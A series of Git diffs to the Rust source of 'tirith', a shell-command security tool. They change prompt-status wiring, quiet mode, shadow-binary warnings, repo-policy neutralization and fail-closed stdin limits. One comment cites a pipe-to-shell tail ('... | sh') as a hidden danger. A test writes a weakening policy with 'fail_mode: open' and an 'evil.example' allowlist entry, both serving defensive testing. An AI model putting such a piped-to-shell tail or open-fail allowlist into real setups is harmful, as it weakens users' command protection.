+        // Restore ambient values on Drop; overwritten below.
+        let _eff_guard = EnvGuard::remove("TIRITH_BASH_EFFECTIVE_PROTECTION");
+        let _status_guard = EnvGuard::remove("TIRITH_STATUS");
+
+        // Effective var present and disagreeing with TIRITH_STATUS → it wins.
+        let _eff = EnvGuard::set(
+            "TIRITH_BASH_EFFECTIVE_PROTECTION",
+            std::path::Path::new("blocks"),
+        );
+        let _status = EnvGuard::set("TIRITH_STATUS", std::path::Path::new("off"));
+        assert_eq!(
+            gather_quick_info().protection_mode,
+            "guarded",
+            "TIRITH_BASH_EFFECTIVE_PROTECTION=blocks must win over TIRITH_STATUS=off"
+        );
+
+        // Effective var unset → fall back to TIRITH_STATUS.
+        drop(_eff);
+        let _eff_removed = EnvGuard::remove("TIRITH_BASH_EFFECTIVE_PROTECTION");
+        let _status2 = EnvGuard::set("TIRITH_STATUS", std::path::Path::new("warn-only"));
+        assert_eq!(
+            gather_quick_info().protection_mode,
+            "warn-only",
+            "absent effective var must fall back to TIRITH_STATUS=warn-only"
+        );
     }
 
     /// The quick JSON has EXACTLY the four documented keys and nothing else

--- a/crates/tirith/src/cli/doctor.rs
+++ b/crates/tirith/src/cli/doctor.rs
@@ -172,19 +172,29 @@ fn run_fix(yes: bool) -> i32 {
     if bash_safe_mode_active() {
         println!("Fix: Clear bash safe-mode flag");
         if confirm("  Clear safe-mode?", yes) {
-            if let Some(state) = tirith_core::policy::state_dir() {
-                let flag = state.join("bash-safe-mode");
-                match std::fs::remove_file(&flag) {
-                    Ok(()) => {
-                        println!("  Safe-mode flag removed. Next shell will attempt enter mode.");
-                        fixed += 1;
-                    }
-                    Err(e) => {
-                        eprintln!("  Failed to remove safe-mode flag: {e}");
-                    }
-                }
+            // `reset_safe_mode` prints its own result; the flag exists here, so a
+            // 0 return means it was removed (the "no flag" branch is unreachable).
+            if reset_safe_mode() == 0 {
+                fixed += 1;
             }
         }
+    }
+
+    // Shadow-binary GUIDANCE (never auto-delete): surface other `tirith`
+    // executables on PATH so the operator can fix ordering themselves. Plain
+    // `println!` (not `note`): a remediation surfaced under an explicit `--fix`
+    // must show even with `--quiet`. Not counted in `fixed` — guidance only.
+    let shadows = crate::cli::find_shadow_binaries();
+    if !shadows.is_empty() {
+        println!("Manual step: other 'tirith' binaries shadow this one:");
+        for shadow in &shadows {
+            println!("    - {shadow}");
+        }
+        println!("  Remove them or fix PATH order so this binary wins.");
+        println!(
+            "  Run `{}` to inspect.",
+            crate::cli::tirith_path_lookup_command()
+        );
     }
 
     if fixed == 0 {
@@ -677,26 +687,26 @@ struct ThreatDbDoctorInfo {
 /// three status fields + a `schema_version`. Built by `gather_quick_info`,
 /// which touches ONLY cheap sources.
 #[derive(Debug, Clone, PartialEq, Eq, serde::Serialize)]
-struct QuickDoctorInfo {
+pub(crate) struct QuickDoctorInfo {
     /// Schema version for the polled shape; bumped only on a breaking change.
-    schema_version: u32,
+    pub(crate) schema_version: u32,
     /// Live protection mode from `TIRITH_STATUS`, using the SAME vocabulary as
     /// `tirith prompt-status`: `guarded` (blocking), `warn-only`, `degraded`,
     /// `off`; unknown values passed through verbatim.
-    protection_mode: String,
+    pub(crate) protection_mode: String,
     /// The single policy file the engine would load (local discovery only), or
     /// `null` when none is discovered. Existence-based — never a network fetch.
-    policy_path_used: Option<String>,
+    pub(crate) policy_path_used: Option<String>,
     /// Whether the shell hook is configured in the detected shell's profile
     /// (mirrors the full report's `hook_configured`).
-    hook_configured: bool,
+    pub(crate) hook_configured: bool,
 }
 
 /// Gather ONLY the three cheap quick-status fields. The unit-testable seam:
 /// must touch nothing expensive — no audit-log read, threat-DB deserialize,
 /// baseline read, PATH walk, or bash-capability cache. Fields come from
 /// `TIRITH_STATUS`, `discover_local_policy_path`, and `check_shell_profile`.
-fn gather_quick_info() -> QuickDoctorInfo {
+pub(crate) fn gather_quick_info() -> QuickDoctorInfo {
     let detected_shell = crate::cli::init::detect_shell().to_string();
     let (_profile, hook_configured) = check_shell_profile(&detected_shell, "tirith: doctor:");
 
@@ -736,7 +746,7 @@ fn run_quick(json: bool) -> i32 {
 }
 
 /// Human-readable 2-3 line summary for `tirith doctor --quick`.
-fn print_quick_human(info: &QuickDoctorInfo) {
+pub(crate) fn print_quick_human(info: &QuickDoctorInfo) {
     println!("  protection:   {}", info.protection_mode);
     println!(
         "  hook:         {}",
@@ -1993,7 +2003,9 @@ fn print_protection_status(status: Option<&str>) {
 fn print_human(info: &DoctorInfo) {
     println!("tirith {}", info.version);
     println!("  binary:       {}", info.binary_path);
-    if !info.shadow_binaries.is_empty() {
+    // Low-value advisory: the noisy shadow-binary warning is suppressed under
+    // `--quiet` (the `--fix` guidance block remains a separate, always-shown path).
+    if !info.shadow_binaries.is_empty() && !crate::cli::is_quiet() {
         println!();
         println!("  WARNING: other 'tirith' binaries found on PATH:");
         for shadow in &info.shadow_binaries {

--- a/crates/tirith/src/cli/init.rs
+++ b/crates/tirith/src/cli/init.rs
@@ -174,7 +174,7 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "if [[ -z \"${_TIRITH_PROMPT_STATUS_LOADED:-}\" ]]; then",
             "  _TIRITH_PROMPT_STATUS_LOADED=1",
             "  setopt PROMPT_SUBST",
-            "  PROMPT='$(tirith prompt-status --short) '\"$PROMPT\"",
+            "  PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"",
             "fi",
             "# <<< tirith prompt-status (M8 ch6) <<<",
         ]
@@ -183,7 +183,7 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "# >>> tirith prompt-status (M8 ch6) >>>",
             "if [ -z \"${_TIRITH_PROMPT_STATUS_LOADED:-}\" ]; then",
             "  _TIRITH_PROMPT_STATUS_LOADED=1",
-            "  PS1='$(tirith prompt-status --short) '\"$PS1\"",
+            "  PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"",
             "fi",
             "# <<< tirith prompt-status (M8 ch6) <<<",
         ]
@@ -197,7 +197,7 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "        functions -c fish_right_prompt _tirith_orig_fish_right_prompt",
             "    end",
             "    function fish_right_prompt",
-            "        tirith prompt-status --short",
+            "        env TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short",
             "        if functions -q _tirith_orig_fish_right_prompt",
             "            _tirith_orig_fish_right_prompt",
             "        end",
@@ -214,7 +214,8 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "        Copy-Item Function:prompt Function:_tirith_orig_prompt -Force",
             "    }",
             "    function global:prompt {",
-            "        $line = (& tirith prompt-status --short) 2>$null",
+            "        $_tps = $env:TIRITH_STATUS; $env:TIRITH_STATUS = $global:TIRITH_STATUS",
+            "        try { $line = (& tirith prompt-status --short) 2>$null } finally { if ($null -eq $_tps) { Remove-Item Env:\\TIRITH_STATUS -ErrorAction SilentlyContinue } else { $env:TIRITH_STATUS = $_tps } }",
             "        if (Get-Command _tirith_orig_prompt -ErrorAction SilentlyContinue) {",
             "            \"$line $(_tirith_orig_prompt)\"",
             "        } else {",
@@ -564,14 +565,18 @@ mod tests {
         assert!(s.contains("# <<< tirith prompt-status (M8 ch6) <<<"));
         assert!(s.contains("setopt PROMPT_SUBST"));
         assert!(s.contains("_TIRITH_PROMPT_STATUS_LOADED"));
-        // Single-quoted so PROMPT re-renders each redraw.
-        assert!(s.contains("'$(tirith prompt-status --short) '"));
+        // Single-quoted so PROMPT re-renders each redraw, AND the non-exported
+        // TIRITH_STATUS is forwarded inline so the child can actually read it
+        // (a bare `tirith prompt-status` child sees a non-exported var as unset).
+        assert!(s.contains("'$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '"));
     }
 
     #[test]
     fn prompt_status_snippet_bash_uses_ps1_with_single_quoted_subst() {
         let s = prompt_status_snippet("bash");
-        assert!(s.contains("PS1='$(tirith prompt-status --short) '\"$PS1\""));
+        assert!(s.contains(
+            "PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\""
+        ));
         assert!(s.contains("_TIRITH_PROMPT_STATUS_LOADED"));
         assert!(s.contains("# >>> tirith prompt-status (M8 ch6) >>>"));
         assert!(s.contains("# <<< tirith prompt-status (M8 ch6) <<<"));
@@ -581,7 +586,19 @@ mod tests {
     fn prompt_status_snippet_fish_wraps_right_prompt() {
         let s = prompt_status_snippet("fish");
         assert!(s.contains("function fish_right_prompt"));
-        assert!(s.contains("tirith prompt-status --short"));
+        // Forwards the non-exported TIRITH_STATUS via `env` so the child sees it.
+        assert!(s.contains("env TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short"));
+        assert!(s.contains("_TIRITH_PROMPT_STATUS_LOADED"));
+    }
+
+    #[test]
+    fn prompt_status_snippet_powershell_forwards_status_env() {
+        let s = prompt_status_snippet("powershell");
+        // PowerShell stores $global:TIRITH_STATUS (a PS variable, NOT $env:), which
+        // a child process cannot see — forward it via $env: for the call, restored
+        // in `finally` so it does not leak into the session.
+        assert!(s.contains("$env:TIRITH_STATUS = $global:TIRITH_STATUS"));
+        assert!(s.contains("finally"));
         assert!(s.contains("_TIRITH_PROMPT_STATUS_LOADED"));
     }
 

--- a/crates/tirith/src/cli/init.rs
+++ b/crates/tirith/src/cli/init.rs
@@ -174,7 +174,7 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "if [[ -z \"${_TIRITH_PROMPT_STATUS_LOADED:-}\" ]]; then",
             "  _TIRITH_PROMPT_STATUS_LOADED=1",
             "  setopt PROMPT_SUBST",
-            "  PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"",
+            "  PROMPT='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PROMPT\"",
             "fi",
             "# <<< tirith prompt-status (M8 ch6) <<<",
         ]
@@ -183,7 +183,7 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
             "# >>> tirith prompt-status (M8 ch6) >>>",
             "if [ -z \"${_TIRITH_PROMPT_STATUS_LOADED:-}\" ]; then",
             "  _TIRITH_PROMPT_STATUS_LOADED=1",
-            "  PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"",
+            "  PS1='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PS1\"",
             "fi",
             "# <<< tirith prompt-status (M8 ch6) <<<",
         ]
@@ -230,10 +230,10 @@ pub(crate) fn prompt_status_snippet(shell: &str) -> String {
         // print a manual-install pointer instead.
         "nushell" | "nu" => [
             "# >>> tirith prompt-status (M8 ch6) >>>",
-            "# Nushell does not support eval-style prompt wiring; add this to",
-            "# your config.nu (~/.config/nushell/config.nu):",
-            "#   $env.PROMPT_COMMAND = {|| $\"(tirith prompt-status --short) ($env.PWD)> \"}",
-            "# See docs/prompt-integration.md for details.",
+            "# Nushell exposes no non-exported TIRITH_STATUS variable, so a live",
+            "# status segment would always read `off`. nushell protection is",
+            "# warn-only regardless — there is no live prompt status to wire up",
+            "# here. See docs/prompt-status.md.",
             "# <<< tirith prompt-status (M8 ch6) <<<",
         ]
         .join("\n"),
@@ -568,14 +568,16 @@ mod tests {
         // Single-quoted so PROMPT re-renders each redraw, AND the non-exported
         // TIRITH_STATUS is forwarded inline so the child can actually read it
         // (a bare `tirith prompt-status` child sees a non-exported var as unset).
-        assert!(s.contains("'$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '"));
+        assert!(
+            s.contains("'$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '")
+        );
     }
 
     #[test]
     fn prompt_status_snippet_bash_uses_ps1_with_single_quoted_subst() {
         let s = prompt_status_snippet("bash");
         assert!(s.contains(
-            "PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\""
+            "PS1='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PS1\""
         ));
         assert!(s.contains("_TIRITH_PROMPT_STATUS_LOADED"));
         assert!(s.contains("# >>> tirith prompt-status (M8 ch6) >>>"));
@@ -613,10 +615,19 @@ mod tests {
     }
 
     #[test]
-    fn prompt_status_snippet_nushell_emits_manual_install_pointer() {
+    fn prompt_status_snippet_nushell_explains_no_live_status() {
         let s = prompt_status_snippet("nushell");
-        // Nushell snippet is a doc pointer (no eval-able closure).
-        assert!(s.contains("docs/prompt-integration.md"));
-        assert!(s.contains("tirith prompt-status --short"));
+        // Nushell exposes no non-exported TIRITH_STATUS, so the snippet must be an
+        // HONEST explanation (warn-only, no live status), NOT a prompt-status
+        // command that would always render `off`.
+        assert!(s.contains("warn-only"));
+        assert!(s.contains("docs/prompt-status.md"));
+        // Must NOT hand the user runnable prompt wiring that would render `off`.
+        // (The `# >>> tirith prompt-status` MARKER legitimately names the command;
+        // we guard against the old `$env.PROMPT_COMMAND` closure instead.)
+        assert!(
+            !s.contains("PROMPT_COMMAND"),
+            "nushell snippet must not suggest a runnable prompt closure (always reads off); got: {s}"
+        );
     }
 }

--- a/crates/tirith/src/cli/init.rs
+++ b/crates/tirith/src/cli/init.rs
@@ -34,9 +34,40 @@ fn check_path_shadow() -> Option<String> {
     ))
 }
 
+/// How long to suppress a repeat PATH-shadow warning. `eval "$(tirith init)"`
+/// runs on every new shell, so without this the warning would print every time.
+const SHADOW_WARN_INTERVAL_SECS: u64 = 24 * 60 * 60;
+
+/// True when the shadow warning hasn't fired in the last 24h (or ever). Cheap
+/// marker stat — checked BEFORE the `check_path_shadow` PATH walk.
+fn shadow_warn_due() -> bool {
+    let Some(marker) = tirith_core::policy::state_dir().map(|d| d.join("shadow-warned")) else {
+        return true;
+    };
+    match std::fs::metadata(&marker).and_then(|m| m.modified()) {
+        Ok(modified) => modified
+            .elapsed()
+            .map(|age| age.as_secs() >= SHADOW_WARN_INTERVAL_SECS)
+            .unwrap_or(true),
+        Err(_) => true,
+    }
+}
+
+fn mark_shadow_warned() {
+    if let Some(dir) = tirith_core::policy::state_dir() {
+        let _ = std::fs::create_dir_all(&dir);
+        let _ = std::fs::write(dir.join("shadow-warned"), b"");
+    }
+}
+
 pub fn run(shell: Option<&str>, prompt_status: bool) -> i32 {
-    if let Some(warning) = check_path_shadow() {
-        eprintln!("{warning}");
+    // Throttled (once/24h) + `--quiet`-gated: a sourced `tirith init` runs on every
+    // new shell. The PATH walk is skipped entirely when a warning isn't due.
+    if !crate::cli::is_quiet() && shadow_warn_due() {
+        if let Some(warning) = check_path_shadow() {
+            eprintln!("{warning}");
+            mark_shadow_warned();
+        }
     }
 
     let shell = shell.unwrap_or_else(|| detect_shell());

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -663,12 +663,15 @@ pub fn find_shadow_binaries() -> Vec<String> {
 /// errors, and JSON do NOT, so quiet never hides anything that matters.
 static QUIET: std::sync::OnceLock<bool> = std::sync::OnceLock::new();
 
+/// Whether `TIRITH_QUIET`'s value is truthy. Pure helper over the raw env value so
+/// the `1`/`true` (case-insensitive) parsing is unit-testable without process globals.
+fn quiet_from_env(val: Option<&str>) -> bool {
+    matches!(val, Some(v) if v == "1" || v.eq_ignore_ascii_case("true"))
+}
+
 /// Set once in `main()` right after clap parse. `--quiet` OR `TIRITH_QUIET=1/true`.
 pub fn init_quiet(flag: bool) {
-    let env = std::env::var("TIRITH_QUIET")
-        .ok()
-        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
-        .unwrap_or(false);
+    let env = quiet_from_env(std::env::var("TIRITH_QUIET").ok().as_deref());
     let _ = QUIET.set(flag || env);
 }
 
@@ -709,6 +712,20 @@ pub fn read_stdin_capped(max: u64) -> std::io::Result<Vec<u8>> {
     Ok(buf)
 }
 
+/// Gate decision for [`warn_repo_policy_neutralized`]: emit the once-per-session notice
+/// only for a REPO-scoped policy (the only untrusted scope) that actually had weakening
+/// fields dropped, and only when this session hasn't been warned yet (marker absent).
+/// Pure so the matrix is unit-testable without `state_dir()` I/O or process globals.
+fn should_warn_neutralized(
+    scope: tirith_core::policy::PolicyScope,
+    neutralized_fields: &[&str],
+    marker_exists: bool,
+) -> bool {
+    scope == tirith_core::policy::PolicyScope::Repo
+        && !neutralized_fields.is_empty()
+        && !marker_exists
+}
+
 /// Once per shell SESSION (per policy), tell the operator that a repo-scoped policy
 /// had WEAKENING fields neutralized (F9 — a repo may tighten, never weaken). A repo
 /// author who sets `allowlist`/`severity_overrides` otherwise gets zero feedback that
@@ -716,8 +733,9 @@ pub fn read_stdin_capped(max: u64) -> std::io::Result<Vec<u8>> {
 /// through `note()`/`--quiet`. `tirith policy effective` always lists the full drop
 /// set regardless of this throttle.
 pub fn warn_repo_policy_neutralized(policy: &tirith_core::policy::Policy) {
-    use tirith_core::policy::PolicyScope;
-    if policy.scope != PolicyScope::Repo || policy.neutralized_fields.is_empty() {
+    if policy.scope != tirith_core::policy::PolicyScope::Repo
+        || policy.neutralized_fields.is_empty()
+    {
         return;
     }
     // Throttle by SESSION id (so it re-warns in every new shell) + policy path —
@@ -734,7 +752,7 @@ pub fn warn_repo_policy_neutralized(policy: &tirith_core::policy::Policy) {
         format!("{:016x}", h.finish())
     };
     let marker = dir.join(format!("{session}-{path_key}"));
-    if marker.exists() {
+    if !should_warn_neutralized(policy.scope, &policy.neutralized_fields, marker.exists()) {
         return;
     }
     eprintln!(
@@ -749,9 +767,12 @@ pub fn warn_repo_policy_neutralized(policy: &tirith_core::policy::Policy) {
 
 #[cfg(test)]
 mod tests {
-    use super::{parse_shim_target, resolve_shim_target, shell_join};
+    use super::{
+        parse_shim_target, quiet_from_env, resolve_shim_target, shell_join, should_warn_neutralized,
+    };
     use std::fs;
     use std::path::PathBuf;
+    use tirith_core::policy::PolicyScope;
 
     #[test]
     fn shell_join_preserves_argv_boundaries() {
@@ -929,5 +950,41 @@ mod tests {
 
             assert_eq!(resolve_npm_wrapper_target(&pip), None);
         }
+    }
+
+    #[test]
+    fn should_warn_neutralized_only_fires_for_repo_with_drops_and_no_marker() {
+        // Repo scope + something neutralized + no session marker → warn.
+        assert!(should_warn_neutralized(
+            PolicyScope::Repo,
+            &["allowlist"],
+            false
+        ));
+        // Already warned this session (marker present) → silent.
+        assert!(!should_warn_neutralized(
+            PolicyScope::Repo,
+            &["allowlist"],
+            true
+        ));
+        // A non-repo (trusted) scope is never sanitized, so never warned — even with
+        // a (would-be) drop set and no marker.
+        assert!(!should_warn_neutralized(
+            PolicyScope::Org,
+            &["allowlist"],
+            false
+        ));
+        // Repo scope but nothing was neutralized → nothing to report.
+        assert!(!should_warn_neutralized(PolicyScope::Repo, &[], false));
+    }
+
+    #[test]
+    fn quiet_from_env_recognizes_only_truthy_values() {
+        for v in ["1", "true", "TRUE", "True"] {
+            assert!(quiet_from_env(Some(v)), "{v:?} should be truthy");
+        }
+        for v in ["0", "", "yes", "false", "01", " 1"] {
+            assert!(!quiet_from_env(Some(v)), "{v:?} should NOT be truthy");
+        }
+        assert!(!quiet_from_env(None), "unset TIRITH_QUIET is not quiet");
     }
 }

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -690,10 +690,22 @@ pub fn note(msg: impl std::fmt::Display) {
 
 /// Read at most `max` bytes from stdin — the shared cap used by `check`/`paste`
 /// when consuming piped input. Returns the raw bytes; callers decode lossily.
+///
+/// FAILS CLOSED on over-limit input: it reads ONE byte past `max` so an oversized
+/// stream is DETECTABLE, then returns an error rather than silently truncating.
+/// Silent truncation is unsafe here — a command analyzed only up to `max` could
+/// drop a dangerous tail (e.g. `... | sh` after a 1 MiB prefix) and read as
+/// benign. Mirrors `paste`'s explicit over-limit rejection.
 pub fn read_stdin_capped(max: u64) -> std::io::Result<Vec<u8>> {
     use std::io::Read as _;
     let mut buf = Vec::new();
     std::io::stdin().take(max + 1).read_to_end(&mut buf)?;
+    if buf.len() as u64 > max {
+        return Err(std::io::Error::new(
+            std::io::ErrorKind::InvalidData,
+            format!("input exceeds the {max}-byte limit"),
+        ));
+    }
     Ok(buf)
 }
 

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -449,6 +449,7 @@ pub mod secret;
 pub mod selfupdate;
 pub mod share;
 pub mod ssh;
+pub mod status;
 pub mod sudo;
 pub mod taint;
 pub mod temp_run;
@@ -655,6 +656,83 @@ pub fn find_shadow_binaries() -> Vec<String> {
         }
     }
     shadows
+}
+
+/// Process-global quiet flag, set once from the root `--quiet` / `TIRITH_QUIET`.
+/// Low-value advisory lines route through [`note`]; security notices, verdicts,
+/// errors, and JSON do NOT, so quiet never hides anything that matters.
+static QUIET: std::sync::OnceLock<bool> = std::sync::OnceLock::new();
+
+/// Set once in `main()` right after clap parse. `--quiet` OR `TIRITH_QUIET=1/true`.
+pub fn init_quiet(flag: bool) {
+    let env = std::env::var("TIRITH_QUIET")
+        .ok()
+        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
+        .unwrap_or(false);
+    let _ = QUIET.set(flag || env);
+}
+
+/// True when LOW-VALUE advisory output should be suppressed. Defaults to `false`
+/// (fail-safe: if `init_quiet` somehow never ran, we never accidentally hide output).
+pub fn is_quiet() -> bool {
+    *QUIET.get().unwrap_or(&false)
+}
+
+/// Print a LOW-VALUE advisory line to stderr unless `--quiet`. Use for clean
+/// "no issues" lines, tips, shadow/session footers, the onboard hint — NEVER for
+/// errors, verdicts, or security notices (degraded protection / repo-policy
+/// neutralization), which must always be visible.
+pub fn note(msg: impl std::fmt::Display) {
+    if !is_quiet() {
+        eprintln!("{msg}");
+    }
+}
+
+/// Read at most `max` bytes from stdin — the shared cap used by `check`/`paste`
+/// when consuming piped input. Returns the raw bytes; callers decode lossily.
+pub fn read_stdin_capped(max: u64) -> std::io::Result<Vec<u8>> {
+    use std::io::Read as _;
+    let mut buf = Vec::new();
+    std::io::stdin().take(max + 1).read_to_end(&mut buf)?;
+    Ok(buf)
+}
+
+/// Once per shell SESSION (per policy), tell the operator that a repo-scoped policy
+/// had WEAKENING fields neutralized (F9 — a repo may tighten, never weaken). A repo
+/// author who sets `allowlist`/`severity_overrides` otherwise gets zero feedback that
+/// it was ignored. This is a SECURITY notice: printed unconditionally, NOT routed
+/// through `note()`/`--quiet`. `tirith policy effective` always lists the full drop
+/// set regardless of this throttle.
+pub fn warn_repo_policy_neutralized(policy: &tirith_core::policy::Policy) {
+    use tirith_core::policy::PolicyScope;
+    if policy.scope != PolicyScope::Repo || policy.neutralized_fields.is_empty() {
+        return;
+    }
+    // Throttle by SESSION id (so it re-warns in every new shell) + policy path —
+    // NOT by file mtime, which would suppress the warning across new shells.
+    let Some(dir) = tirith_core::policy::state_dir().map(|d| d.join("policy-weakening-warned"))
+    else {
+        return;
+    };
+    let session = tirith_core::session::resolve_session_id();
+    let path_key = {
+        use std::hash::{Hash, Hasher};
+        let mut h = std::collections::hash_map::DefaultHasher::new();
+        policy.path.hash(&mut h);
+        format!("{:016x}", h.finish())
+    };
+    let marker = dir.join(format!("{session}-{path_key}"));
+    if marker.exists() {
+        return;
+    }
+    eprintln!(
+        "tirith: this repo's .tirith/policy.yaml is tightening-only — the following \
+         weakening field(s) were ignored: {}.\n  See the resolved policy with \
+         `tirith policy effective`.",
+        policy.neutralized_fields.join(", ")
+    );
+    let _ = std::fs::create_dir_all(&dir);
+    let _ = std::fs::write(&marker, b"");
 }
 
 #[cfg(test)]

--- a/crates/tirith/src/cli/onboard.rs
+++ b/crates/tirith/src/cli/onboard.rs
@@ -131,6 +131,9 @@ pub fn run(mode: Option<&str>, apply: bool, json: bool) -> i32 {
     if apply {
         return apply_actions(&report);
     }
+    // Discoverability: `--apply` already performs the steps, but the report never
+    // named it, so users didn't know it existed.
+    crate::cli::note("Run `tirith onboard --apply` to perform the recommended safe actions.");
     0
 }
 

--- a/crates/tirith/src/cli/paste.rs
+++ b/crates/tirith/src/cli/paste.rs
@@ -102,6 +102,7 @@ pub fn run(
     // close the TOCTOU window where a `.tirith/policy.yaml` change between two
     // `Policy::discover` reads routed detection and enforcement against different policies.
     let (mut verdict, policy) = engine::analyze_returning_policy(&ctx);
+    crate::cli::warn_repo_policy_neutralized(&policy);
 
     // M4 item 8: origin attribution — the CLI is the only layer that knows whether the
     // caller was a human, an agent (TIRITH_INTEGRATION), or CI. The audit below picks it up.

--- a/crates/tirith/src/cli/policy.rs
+++ b/crates/tirith/src/cli/policy.rs
@@ -701,14 +701,7 @@ struct EffectivePolicy {
 ///
 /// [`PolicyScope`]: tirith_core::policy::PolicyScope
 fn scope_label(scope: tirith_core::policy::PolicyScope) -> &'static str {
-    use tirith_core::policy::PolicyScope;
-    match scope {
-        PolicyScope::Repo => "repo",
-        PolicyScope::User => "user",
-        PolicyScope::Org => "org",
-        PolicyScope::Remote => "remote",
-        PolicyScope::Default => "default",
-    }
+    scope.as_str()
 }
 
 /// Gather the effective local policy for `cwd`: its source path + scope (via

--- a/crates/tirith/src/cli/policy.rs
+++ b/crates/tirith/src/cli/policy.rs
@@ -1304,7 +1304,7 @@ mod tests {
             std::fs::create_dir_all(cwd.join(".git")).unwrap();
             std::fs::create_dir_all(cwd.join(".tirith")).unwrap();
             std::fs::write(
-                cwd.join(".tirith/policy.yaml"),
+                cwd.join(".tirith").join("policy.yaml"),
                 "fail_mode: open\nallowlist:\n  - evil.example\n",
             )
             .unwrap();
@@ -1312,7 +1312,11 @@ mod tests {
             let info = gather_effective(cwd.to_str());
 
             // Source path: the repo-root policy we just wrote.
-            let expected_path = cwd.join(".tirith/policy.yaml").display().to_string();
+            let expected_path = cwd
+                .join(".tirith")
+                .join("policy.yaml")
+                .display()
+                .to_string();
             assert_eq!(
                 info.source_path.as_deref(),
                 Some(expected_path.as_str()),

--- a/crates/tirith/src/cli/policy.rs
+++ b/crates/tirith/src/cli/policy.rs
@@ -683,6 +683,147 @@ fn print_tune_human(report: &tirith_core::audit_tune::TuneReport) {
     eprintln!("  tirith did not change your policy. Apply any suggestion by editing your .tirith/policy.yaml.");
 }
 
+/// The fully-resolved local policy plus its provenance, as gathered for
+/// `tirith policy effective`. Factored out of [`effective`] so the gathering is
+/// unit-testable without capturing stdout (the rendering is a thin function of
+/// these fields).
+struct EffectivePolicy {
+    /// Source file the policy was loaded from, or `None` for built-in defaults.
+    source_path: Option<String>,
+    /// Discovery scope (which branch matched) — drives the trust framing below.
+    scope: tirith_core::policy::PolicyScope,
+    /// The resolved policy itself (repo-scope sanitization already applied).
+    policy: Policy,
+}
+
+/// Map a [`PolicyScope`] to its lowercase label for output. The single mapping
+/// point shared by both the JSON `scope` field and the human framing.
+///
+/// [`PolicyScope`]: tirith_core::policy::PolicyScope
+fn scope_label(scope: tirith_core::policy::PolicyScope) -> &'static str {
+    use tirith_core::policy::PolicyScope;
+    match scope {
+        PolicyScope::Repo => "repo",
+        PolicyScope::User => "user",
+        PolicyScope::Org => "org",
+        PolicyScope::Remote => "remote",
+        PolicyScope::Default => "default",
+    }
+}
+
+/// Gather the effective local policy for `cwd`: its source path + scope (via
+/// [`discover_local_policy_path_scoped`]) and the fully-resolved policy (via
+/// [`Policy::discover_local_only`], which runs LOCAL resolution + repo-scope
+/// sanitize and NEVER fetches remotely). Discovery-only; no network.
+///
+/// [`discover_local_policy_path_scoped`]: tirith_core::policy::discover_local_policy_path_scoped
+fn gather_effective(cwd: Option<&str>) -> EffectivePolicy {
+    let (source_path, scope) = match tirith_core::policy::discover_local_policy_path_scoped(cwd) {
+        Some((path, scope)) => (Some(path.display().to_string()), scope),
+        None => (None, tirith_core::policy::PolicyScope::Default),
+    };
+    let policy = Policy::discover_local_only(cwd);
+    EffectivePolicy {
+        source_path,
+        scope,
+        policy,
+    }
+}
+
+/// `tirith policy effective` — a transparency surface that prints the FULLY-
+/// RESOLVED effective policy for the current directory, where it came from, and
+/// (for a repo-scoped policy) which weakening fields were neutralized down to
+/// tightening-only. Discovery-only: no path argument, no network fetch (uses
+/// [`Policy::discover_local_only`], not [`Policy::discover`]).
+pub fn effective(json: bool) -> i32 {
+    let cwd = std::env::current_dir()
+        .ok()
+        .map(|p| p.display().to_string());
+
+    let info = gather_effective(cwd.as_deref());
+
+    if json {
+        print_effective_json(&info)
+    } else {
+        print_effective_human(&info)
+    }
+}
+
+fn print_effective_json(info: &EffectivePolicy) -> i32 {
+    #[derive(serde::Serialize)]
+    struct Output<'a> {
+        source_path: Option<&'a str>,
+        scope: &'a str,
+        neutralized_fields: &'a [&'static str],
+        policy: &'a Policy,
+    }
+
+    let output = Output {
+        source_path: info.source_path.as_deref(),
+        scope: scope_label(info.scope),
+        neutralized_fields: &info.policy.neutralized_fields,
+        policy: &info.policy,
+    };
+
+    if super::write_json_stdout(
+        &output,
+        "tirith policy effective: failed to write JSON output",
+    ) {
+        0
+    } else {
+        1
+    }
+}
+
+fn print_effective_human(info: &EffectivePolicy) -> i32 {
+    use tirith_core::policy::PolicyScope;
+
+    eprintln!(
+        "tirith policy effective: source = {}",
+        info.source_path
+            .as_deref()
+            .unwrap_or("(none — built-in defaults)")
+    );
+    eprintln!("  scope: {}", scope_label(info.scope));
+    eprintln!();
+
+    // Render the resolved policy as readable YAML (the crate already depends on
+    // serde_yaml; the policy is `Serialize`). On the unlikely serialize error,
+    // fall back to a note rather than failing the command — the provenance and
+    // neutralization sections below are the load-bearing transparency output.
+    match serde_yaml::to_string(&info.policy) {
+        Ok(yaml) => {
+            eprintln!("  effective policy:");
+            for line in yaml.lines() {
+                eprintln!("    {line}");
+            }
+        }
